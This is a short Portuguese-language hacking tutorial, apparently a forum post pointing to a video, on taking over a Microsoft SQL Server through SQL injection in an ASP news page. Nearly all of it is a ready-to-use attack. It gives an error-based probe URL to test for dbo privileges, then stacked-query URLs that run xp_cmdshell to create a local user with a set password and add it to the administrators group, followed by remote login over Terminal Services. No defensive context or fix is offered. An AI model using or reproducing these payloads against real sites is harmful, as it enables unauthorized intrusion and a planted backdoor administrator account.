Rooting SQL Server via SQL Injection

Exemplo:

www.site.com/noticia.asp?id=10

Basta fazer:

www.site.com/noticia.asp?id=convert(int,(select+user));--

Se aparecer 'dbo' no erro, eh porque é vulnerável. Dai, prossegue:

www.site.com/noticia.asp?id=10;exec%20master..xp_cmdshell 'net user blue_man hacker /add';--
www.site.com/noticia.asp?id=10;exec%20master..xp_cmdshell 'net localgroup administrators blue_man /add';--

Depois eh so conectar via Terminal Service (se este estiver ativado, claro).

Link pro video:
Rooting SQL Server via SQL Injection